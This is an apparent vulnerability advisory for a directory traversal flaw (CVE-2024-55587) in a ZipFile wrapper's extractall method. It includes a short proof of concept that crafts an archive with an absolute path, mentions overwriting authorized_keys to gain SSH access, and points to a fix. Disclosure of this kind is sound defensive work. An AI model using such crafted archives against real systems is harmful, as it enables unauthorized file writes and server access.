Directory Traversal Vulnerability (CVE-2024-55587)

[CSIRTTrizna]

Descritpion

The extract and extractall methods in the ZipFile class are vulnerable to directory traversal attacks, allowing files to be written anywhere on disk, regardless of the target path specified by the developer.
Detailed description of the vulnerability is available on our webpage:

Proof of Concept

If we create zip archive with following code:

import pyzipper
import time

with pyzipper.ZipFile("exploit.zip", 'w', compression=pyzipper.ZIP_LZMA) as zf:
    zip_info = zf.zipinfo_cls(filename="/tmp/vulnerable.txt", date_time=time.localtime(time.time())[:6])
    zf.writestr(zip_info, "vulnerable")

Then we can extract the created archive using extractall method:

from libarchive.zip import ZipFile

with ZipFile("exploit.zip",  mode="r") as archive:
    archive.extractall(path="./")

After extracting the archive using the extractall method, the vulnerable.txt file will be created in the /tmp directory with the contents "vulnerable".

Possible Impact

This vulnerability can be exploited, for example, to overwrite the authorized_keys file in a user's home directory, enabling an attacker to connect to the affected server via SSH.

Summary

Fix for this vulnerability is available in pull request #41 , containing additional filename sanitization.